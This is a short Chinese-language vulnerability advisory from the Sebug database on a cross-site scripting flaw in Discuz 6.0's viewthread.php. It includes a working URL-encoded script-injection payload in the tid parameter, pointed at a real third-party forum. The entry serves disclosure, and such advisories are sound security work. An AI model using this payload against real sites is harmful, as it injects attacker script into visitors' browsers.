19235: Discuz 6.0 viewthread.php 跨站漏洞

Search
Vulndb
Appdir
- More >>

Discuz 6.0 viewthread.php 跨站漏洞

SEBUG-ID:19235

SEBUG-Appdir:Discuz!

Published:2010-03-06

author:猪哥靓 (67856456_at_qq.com)

Vulnerable:

Discuz 6.0

Discription:

北洋贱队（http://bbs.seceye.org）首发

demo:
http://bbs.51testing.com/viewthread.php?tid=%22%3E%3E%3Cscript%3Ealert%28insafe--SecEyE%29%3C/script%3E%3Cmarquee%3E%3Ch1%3EINSAFE%20By%20SECEYE%3C/h1%3E%3C/marquee%3E
不解释，COPY的朋友请留个北洋贱队的url就可以了

<*References

http://bbs.seceye.org/viewthread.php?tid=22
http://www.gohack.org

SEBUG Solution:

升级到最新版本

// sebug.net [2010-03-06]